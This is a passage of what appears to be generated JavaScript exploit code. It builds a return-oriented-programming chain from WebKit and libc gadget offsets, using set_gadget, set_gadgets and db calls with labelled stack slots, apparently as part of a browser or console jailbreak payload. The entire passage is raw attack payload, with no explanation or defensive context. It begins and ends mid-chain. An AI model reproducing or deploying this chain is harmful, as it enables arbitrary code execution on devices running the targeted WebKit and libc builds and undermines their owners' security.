webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3970: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3972: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+225768, //L3975 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+225784, //L3976 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+225736, //L3973 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+225752, //L3974 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3973: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3974: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3975: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3976: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+225944, //L3980 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+225912, //L3978 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+225928, //L3979 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3977: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L3978: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3979: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3980: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+226032, //L3981 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+226048, //L3982 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3981: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3982: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+226224, //L3984 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+226240, //L3985 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+226208, //L3983 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3983: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3984: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3985: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+226384, //L3988 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+226400, //L3989 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+226352, //L3986 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3986: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3987: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L3988: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3989: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+226472, //L3990 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3990: db([0, 0]); // 0x0 //L3952: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+226600, //L3993 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+226616, //L3994 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+226584, //L3992 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3992: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3993: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3994: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+226776, //L3999 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+226792, //L4000 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+226728, //L3996 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3996: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3997: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L3998: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3999: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4000: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+226904, //L4001+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+226896, //L4001 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4001: db([0, 0]); // 0x0 set_gadgets([ ropchain+226920, //L4001+24 ropchain+227872, //L3995 libc_base+764760, //pop rsi ropchain+226960, //L4002 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4002: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4004: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+227080, //L4007 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+227064, //L4005 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4005: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4007: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+227224, //L4010 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+227192, //L4008 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+227208, //L4009 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4008: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4009: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4010: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+227320, //L4012 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4011: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4012: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4013: db([32, 0]); // 0x20 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+227424, //L4014 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+227440, //L4015 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4014: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4015: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+227616, //L4017 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+227632, //L4018 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+227600, //L4016 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4016: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4017: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4018: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+227776, //L4021 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+227792, //L4022 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+227744, //L4019 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4019: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4020: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4021: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4022: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+227864, //L4023 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4023: db([0, 0]); // 0x0 //L3995: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+227992, //L4026 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+228008, //L4027 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+227976, //L4025 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4025: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4026: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4027: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+228120, //L4029 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+228168, //L4032 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+228136, //L4030 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4029: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4030: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4031: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4032: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+228280, //L4033+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+228272, //L4033 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4033: db([0, 0]); // 0x0 set_gadgets([ ropchain+228296, //L4033+24 ropchain+230320, //L4028 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+228336, //L4034 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4034: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4035: db([48, 0]); // 0x30 set_gadget(libc_base+144605,); //pop rdi //L4036: db([48, 0]); // 0x30 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+228528, //L4040 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+228496, //L4038 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+228512, //L4039 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4037: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L4038: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4039: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4040: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+228584, //L4042 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L4042: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+228712, //L4044 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+228728, //L4045 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+228696, //L4043 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4043: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4044: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4045: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+228824, //L4047 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+228808, //L4046 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4046: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4047: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+228904, //L4048 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4048: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4050: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+229024, //L4053 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+229008, //L4051 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4051: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4053: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+229168, //L4056 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+229136, //L4054 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+229152, //L4055 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4054: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4055: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4056: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+229240, //L4058 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4058: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+229296, //L4059 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4059: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+229376, //L4061 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4061: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4063: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+229496, //L4066 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+229480, //L4064 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4064: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4066: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+229640, //L4069 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+229608, //L4067 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+229624, //L4068 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4067: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4068: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4069: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+229728, //L4071 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L4070: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L4071: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+229784, //L4072 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4072: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4074: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+229864, //L4076 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4076: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+229968, //L4077 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+229984, //L4078 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4077: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4078: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+230072, //L4080 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4080: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+230128, //L4081 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4081: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+230200, //L4084 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4084: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+230256, //L4085 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4085: db([0, 0]); // 0x0 set_gadgets([ webkit_base+1121481, //mov [rax], cl libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+782311, //pop rsp ropchain+230336, //L4087 //L4028: libc_base+782311, //pop rsp ropchain+230352, //L4088 //L4087: libc_base+782311, //pop rsp ropchain+223984, //L3929 //L4088: //L3641: libc_base+764760, //pop rsi ropchain+230392, //L4089 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4089: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4091: db([96, 0]); // 0x60 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+230512, //L4094 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+230496, //L4092 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4092: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4094: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+230688, //L4097 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+230704, //L4098 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+230656, //L4095 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+230672, //L4096 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4095: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4096: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4097: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4098: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+230800, //L4100 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+230784, //L4099 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4099: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4100: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L4101: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L4102: db([4, 0]); // 0x4 set_gadget(libc_base+763368,); //pop rcx //L4103: db([4, 0]); // 0x4 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+231000, //L4105 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4105: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+231056, //L4106 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4106: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+231192, //L4110 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+231176, //L4109 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4108: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4109: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4110: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+231328, //L4113 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+231360, //L4115 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+231312, //L4112 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4112: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4113: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4114: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4115: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+231472, //L4116+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+231464, //L4116 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4116: db([0, 0]); // 0x0 set_gadgets([ ropchain+231488, //L4116+24 ropchain+261088, //L4111 libc_base+764760, //pop rsi ropchain+231528, //L4117 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4117: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4119: db([96, 0]); // 0x60 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+231648, //L4122 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+231632, //L4120 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4120: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4122: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+231824, //L4125 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+231840, //L4126 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+231792, //L4123 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx 